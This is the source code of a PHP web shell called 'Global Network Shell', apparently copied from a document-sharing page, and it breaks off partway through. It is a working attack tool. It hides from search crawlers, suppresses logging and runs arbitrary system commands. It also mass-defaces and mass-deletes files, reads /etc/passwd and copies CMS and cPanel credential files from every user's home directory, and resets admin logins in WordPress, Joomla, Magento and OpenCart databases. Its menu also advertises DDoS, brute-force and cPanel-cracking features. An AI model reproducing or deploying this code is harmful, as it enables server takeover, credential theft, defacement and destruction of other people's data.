Você está na página 1de 63

<?

php
$auth_pass = "f736cb1bf3f982aae24d673c763d2c92";//globalnetwork
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stri
pslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<title>Global Network Shell</title>
<style>
body{
background:#000;
backgroud-size:100%;
}
body{cursor: url("http://downloads.totallyfreecursors.com/thumbnails/aliendance
.gif"), auto;}
input{
text-align:center;
border-top:3px solid blue;
border-left:3px solid blue;
border-bottom:3px solid #fff;
border-right:3px solid #fff;
background:transparent;
color:#333;
}
input:hover{
transition-duration:0.5s;
-o-transition-duration:0.5s;
-moz-transition-duration:0.5s;
-webkit-transition-duration:0.5s;
border-style:dashed;
cursor:pointer;
}
#forbid{
display:none;
}
table{
margin-top:25px;

}
</style>
<center>
<form method="post">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTR9nOWXGUG7_mU3b
ewcrWOAFvrBjxTJc5rEp7dhMkQI1XnBqc" width=250 height=250/>
<table title="selamat datang <?=$_SERVER['REMOTE_ADDR']?> di shell ">
<tr><td colspan=2><h1 style="color:red;text-shadow:2px 3px 5px #fff;"><center>[
Global Network Shell ]</h1><br><font color=white> <center>Welcome <b>guest</b> t
o Shell <?=$_SERVER['HTTP_HOST']?></font></td></tr>
<tr><td><font color=blue size=5 face=courier new> Username :</font></td><td>
<input type="text" value="Global Network" title="you can't change this username.
" disabled></td></tr>
<tr><td><font color=white size=5 face=courier new>Password :</font></td><td>
<input type="password" name="pass" ></td></tr>
<tr><td colspan=2><input type="submit" value="login!" style="width:100%;color:wh
ite;"></td></tr>
</table>
</center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')
) {
@ob_clean();
$file = $_GET['file'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
?>
<html>
<head>
<title>Global Network Shell</title>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html{color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
.phpinfo th, th{
background:#191919;
border-bottom:1px solid #333333;
font-weight:normal;
}
body {

background-color: black;
text-align: center;
padding-left: 5px;
margin: 10px auto;
resize: none;
color: gold;
}
a {
color: white;
text-decoration: none;
}
.php
*{
font-size:12px;
font-family:Tahoma,Verdana,Arial;
}
textarea {
border: 1px solid #FFFF00;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #FFFF00;
font-family: 'Ubuntu';
font-size: 13px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
body{cursor: url("http://downloads.totallyfreecursors.com/thumbnails/aliendance
.gif"), auto;}
th {
padding: 10px;
}
a:hover {
color: gold;
text-decoration: underline;
}
#menu{
background:#111111;
margin:8px 2px 4px 2px;
}
#menu a{
padding:4px 18px;
margin:0;
background:#222222;
letter-spacing:2px;
-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radiu
s: 5px; border-radius: 5px;
}
.table_home, .th_home, .td_home {
border: 2px solid blue;

}
.jaya{ font-family: ;}
r-right:1px solid #333333;
}
</style>
</head>
<?php
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=lime>".$perm."</font>";
}
}
function r($dir,$perm) {
if(!is_readable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=lime>".$perm."</font>";
}
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';

} elseif (($perms & 0x4000) == 0x4000) {


// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hdd($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
if(get_magic_quotes_gpc()) {
function idx_ss($array) {
return is_array($array) ? array_map('idx_ss', $array) : stripsla
shes($array);
}
$_POST = idx_ss($_POST);
}
error_reporting(0);

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=gold>ON</font>"
: "<font color=gold>OFF</font>";
$ds = @ini_get("font color=gold>disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=gold>ON</font>" : "<f
ont color=gold>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=gold>ON</font>" : "<fon
t color=gold>OFF</font>";
$wget = (exe('wget --help')) ? "<font color=gold>ON</font>" : "<font color=gold>
OFF</font>";
$perl = (exe('perl --help')) ? "<font color=gold>ON</font>" : "<font color=gold>
OFF</font>";
$python = (exe('python --help')) ? "<font color=gold>ON</font>" : "<font color=g
old>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=gold>$ds</font>" : "<font color=gold>NON
E</font>";
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo "System: <font color=gold>".php_uname()."</font><br>";
echo "User: <font color=gold>".$user."</font> (".$uid.") Group: <font color=gold
>".$group."</font> (".$gid.")<br>";
echo "Server IP: <font color=gold>".gethostbyname($_SERVER['HTTP_HOST'])."</font
> | Your IP: <font color=gold>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=gold>$used</font> / <font color=gold>$total</font> ( Free
: <font color=gold>$freespace</font> )<br>";
echo "Safe Mode: $sm<br>";
echo "Disable Functions: $show_ds<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
<br>";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {
echo "<a href='?dir=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];

if($i != $c_dir) {
echo "/";
}
}
echo "'>$cdir</a>/";
}
echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
?>
<center><div id="menu">
<?php
echo "<hr>";
echo "<center>";
echo "<a href='?'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAA
AQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG
95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h
6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAz
PD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/Oa
Gq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3B
wAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikY
ghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05O
TkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOB
xviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgY
i+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQg
gZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L
3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T
0AAAAASUVORK5CYII=' height=18 width=34></a>";
echo "<a href='?dir=$dir&do=upload'>Upload</a> ";
echo "<a href='?dir=$dir&do=mass_deface'>Mass Deface";
echo "<a href='?dir=$dir&do=mass_delete'>Mass Delete</a>";
echo "<a href='?dir=$dir&do=csrfup'>CSRF Exploiter</a>";
echo "<a href='?dir=$dir&do=cms_detector'>cms_detector</a>";
echo "<a href='?dir=$dir&do=network'>Network</a>";
echo "<a href='?dir=$dir&do=ddos'>Ddos</a>";
echo "<a href='?dir=$dir&do=config'>Config</a>";
echo "<a href='?dir=$dir&do=jumping'>Jumping</a>";
echo "<a href='?dir=$dir&do=cmd'>Command</a>";
echo "<a href='?dir=$dir&do=tools'>Tools</a>";
echo "<br><br><a href='?dir=$dir&do=symlink'>Symlink</a>";
echo "<a href='?dir=$dir&do=ports'>Port Scanner</a>";
echo "<a href='?dir=$dir&do=ende'>Encode decode</a>";
echo "<a href='?dir=$dir&do=cpanel'>CPanel Crack</a>";
echo "<a href='?dir=$dir&do=magento'>Magento ADD admin</a>";
echo "<a href='?dir=$dir&do=krdp'>Krdp Create</a>";
echo "<a href='?dir=$dir&do=admf'>Admin Finder</a>";
echo "<a href='?dir=$dir&do=zoneh'>Zone-H</a>";
echo "<a href='?dir=$dir&do=defacerid'>Defacer.ID</a>";
echo "<a href='?dir=$dir&do=adminer'>Adminer</a>";
echo "<br><br><a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a>";
echo "<a href='?dir=$dir&do=smtp'>SMTP Grabber</a>";
echo "<a href='?dir=$dir&do=brutewp'>WP Brute Force</a>";
echo "<a href='?dir=$dir&do=cgi'>Cgi Telnet</a>";
echo "<a href='?dir=$dir&do=whois'>whois</a>";
echo "<a href='?dir=$dir&do=dbdump'>DB Dump</a>";
echo "<a href='?dir=$dir&do=http'>HTTP Injector</a>";
echo "<a href='?dir=$dir&do=fake_root'>Fake Root</a>";
echo "<a href='?dir=$dir&do=dorker'>Auto Drok</a>";
echo "<a href='?dir=$dir&do=domain'>Domain</a>";
echo "<a href='?dir=$dir&do=about'>About</a>";
echo "<br><br><a href='?dir=$dir&do=bypass'>bypass</a>";
echo "<a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a>";

echo "<a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a>";


echo "<a href='?dir=$dir&do=pyhton'>bypass exploit</a>";
echo "<a style='color: white;' href='?logout=true'>Logout</a>";
echo "</center>";
echo "<hr>";
echo "</center>";
echo "</table>";
if($_GET['logout'] == true) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo "<script>window.location='?';</script>";
}elseif($_GET['do'] == 'upload') {
echo "<center>";
if($_POST['upload']) {
if($_POST['tipe_upload'] == 'biasa') {
if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES
['ix_file']['name']."")) {
$act = "<font color=lime>Uploaded!</font> at <i>
<b>$dir/".$_FILES['ix_file']['name']."</b></i>";
} else {
$act = "<font color=red>failed to upload file</f
ont>";
}
} else {
$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']
['name'];
$web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['nam
e'];
if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
if(@copy($_FILES['ix_file']['tmp_name'], $root))
{
$act = "<font color=lime>Uploaded!</font
> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
} else {
$act = "<font color=red>failed to upload
file</font>";
}
} else {
$act = "<font color=red>failed to upload file</f
ont>";
}
}
}
echo "Upload File:
<form method='post' enctype='multipart/form-data'>
<input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w
($dir,"Writeable")." ]
<input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w
($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
<input type='file' name='ix_file'>
<input type='submit' value='upload' name='upload'>
</form>";
echo $act;
echo "</center>";
} elseif($_GET['do'] == 'mass_deface') {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;

if($dirb === '.') {


file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "<font color=lime><
/font> $lokasi<br>";
file_put_contents($lokas
i, $isi_script);
$idx = sabun_massal($dir
c,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=lime>
DONE</font>] $dirb/$namafile<br>";
file_put_contents($lokas
i, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe_sabun'] == 'mahal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['
script']);
echo "</div>";
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['s
cript']);
echo "</div>";
}
} else {
echo "<center>";
echo "<form method='post'>
<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input
type='radio' name='tipe_sabun' value='mahal'>Massal<br>

<font style='text-decoration: underline;'>Folder:</font><br>


<input type='text' name='d_dir' value='$dir' style='width: 450px;' heigh
t='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='xai.php' style='width: 450px;' h
eight='10'><br>
<font style='text-decoration: underline;'>Index File:</font><br>
<textarea name='script' style='width: 450px; height: 200px;'>Hacked by I
ndonesian People -XaiSyndicate</textarea><br>
<input type='submit' name='start' value='Mass Deface' style='width: 450p
x;'>
</form></center>";
}
} elseif($_GET['do'] == 'mass_delete') {
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namaf
ile")) {
unlink("".dirname($dir)."/$namaf
ile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi))
{
echo "[<font col
or=lime>DELETED</font>] $lokasi<br>";
unlink($lokasi);
$idx = hapus_mas
sal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<center>";
echo "<form method='post'>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' heigh
t='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='xai.php' style='width: 450px;' h
eight='10'><br>

<input type='submit' name='start' value='Mass Delete' style='width: 450p


x;'>
</form></center>";
}
} elseif($_GET['do'] == 'config') {
$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read
/etc/passwd</font></pre>");
$idx = mkdir("xai_config", 0777);
$isi_htc = "Options all\nRequire None\nSatisfy Any";
$htc = fopen("xai_config/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_idx) {
$user_config_dir = "/home/$user_idx/public_html/
";
if(is_readable($user_config_dir)) {
$grab_config = array(
"/home/$user_idx/.my.cnf" => "cp
anel",
"/home/$user_idx/.accesshash" =>
"WHM-accesshash",
"/home/$user_idx/public_html/vdo
_config.php" => "Voodoo",
"/home/$user_idx/public_html/bwconfigs/config.ini" => "BosWeb",
"/home/$user_idx/public_html/con
fig/koneksi.php" => "Lokomedia",
"/home/$user_idx/public_html/lok
omedia/config/koneksi.php" => "Lokomedia",
"/home/$user_idx/public_html/cli
entarea/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/whm
/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/whm
cs/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/for
um/config.php" => "phpBB",
"/home/$user_idx/public_html/sit
es/default/settings.php" => "Drupal",
"/home/$user_idx/public_html/con
fig/settings.inc.php" => "PrestaShop",
"/home/$user_idx/public_html/app
/etc/local.xml" => "Magento",
"/home/$user_idx/public_html/joo
mla/configuration.php" => "Joomla",
"/home/$user_idx/public_html/con
figuration.php" => "Joomla",
"/home/$user_idx/public_html/wp/
wp-config.php" => "WordPress",
"/home/$user_idx/public_html/wor
dpress/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/wpconfig.php" => "WordPress",
"/home/$user_idx/public_html/adm
in/config.php" => "OpenCart",
"/home/$user_idx/public_html/slc

onfig.php" => "Sitelok",


"/home/$user_idx/public_html/app
lication/config/database.php" => "Ellislab");
foreach($grab_config as $config => $nama
_config) {
$ambil_config = file_get_content
s($config);
if($ambil_config == '') {
} else {
$file_config = fopen("xa
i_config/$user_idx-$nama_config.txt","w");
fputs($file_config,$ambi
l_config);
}
}
}
}
}
}
echo "<center><a href='?dir=$dir/xai_config'><font color=lime>Done</font
></a></center>";
} elseif($_GET['do'] == 'jumping') {
$i = 0;
echo "<pre><div class='margin: 5px auto;'>";
$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc
/passwd</font>");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_idx_jump) {
$user_jumping_dir = "/home/$user_idx_jump/public
_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[<font color=lime>R</font>] <a h
ref='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
if(is_writable($user_jumping_dir)) {
$jrw = "[<font color=lime>RW</fo
nt>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font><
/a>";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents
("/etc/named.conf");
if($domain_jump == '') {
echo " => ( <font color=
red>gabisa ambil nama domain nya</font> )<br>";
} else {
preg_match_all("#/var/na
med/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1]
as $dj) {
$user_jumping_ur
l = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_ur
l = $user_jumping_url['name'];
if($user_jumping

_url == $user_idx_jump) {
echo " =
> ( <u>$dj</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HT
TP_HOST'])."";
}
echo "</div></pre>";
} elseif($_GET['do'] == 'auto_edit_user') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']
) < 6) {
echo "username atau password harus lebih dari 6 karakter
";
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = ambilkata($config,"host = '","
'");
$dbuser = ambilkata($config,"user = '","
'");
$dbpass = ambilkata($config,"password =
'","'");
$dbname = ambilkata($config,"db = '","'"
);
$dbprefix = ambilkata($config,"dbprefix
= '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$d
bpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix
ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '"
,"'");
$update = mysql_query("UPDATE $prefix SE
T username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Joomla<br>";
if($site == '') {

echo "Sitename => <font color=re


d>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "Sitename => $site<br>";
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>
".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime
>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = ambilkata($config,"DB_HOST', '
","'");
$dbuser = ambilkata($config,"DB_USER', '
","'");
$dbpass = ambilkata($config,"DB_PASSWORD
', '","'");
$dbname = ambilkata($config,"DB_NAME', '
","'");
$dbprefix = ambilkata($config,"table_pre
fix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$d
bpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix
ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option
ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "Login => <font co
lor=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href=
'$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SE
T user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Wordpress<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>
".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime
>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/Magento|Mage_Core/",$confi
g)) {
$dbhost = ambilkata($config,"<host><![CD

ATA[","]]></host>");
$dbuser = ambilkata($config,"<username><
![CDATA[","]]></username>");
$dbpass = ambilkata($config,"<password><
![CDATA[","]]></password>");
$dbname = ambilkata($config,"<dbname><![
CDATA[","]]></dbname>");
$dbprefix = ambilkata($config,"<table_pr
efix><![CDATA[","]]></table_prefix>");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$d
bpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix
ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option
WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
$url_target = "Login => <font co
lor=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href=
'$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SE
T username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Magento<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>
".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime
>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|D
IR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = ambilkata($config,"'DB_HOSTNAM
E', '","'");
$dbuser = ambilkata($config,"'DB_USERNAM
E', '","'");
$dbpass = ambilkata($config,"'DB_PASSWOR
D', '","'");
$dbname = ambilkata($config,"'DB_DATABAS
E', '","'");
$dbprefix = ambilkata($config,"'DB_PREFI
X', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$d
bpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix
ORDER BY user_id ASC");

$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = ambilkata($config,"HTTP_SERVER
', '","'");
if($target == '') {
$url_target = "Login => <font co
lor=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href=
'$target' target='_blank'><u>$target</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SE
T username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => OpenCart<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>
".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime
>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/panggil fungsi validasi xs
s dan injection/",$config)) {
$dbhost = ambilkata($config,'server = "'
,'"');
$dbuser = ambilkata($config,'username =
"','"');
$dbpass = ambilkata($config,'password =
"','"');
$dbname = ambilkata($config,'database =
"','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$d
bpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option
ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
$url_target = "Login => <font co
lor=red>error, gabisa ambil nama domain nyaa</font><br>";
if($target2 == '') {
$url_target2 = "Login =>
<font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$cek_login3 = file_get_c
ontents("$target2/adminweb/");
$cek_login4 = file_get_c
ontents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Loko
media|Administrator/", $cek_login3)) {
$url_target2 = "
Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a
><br>";

} elseif(preg_match("/CM
S Lokomedia|Lokomedia/", $cek_login4)) {
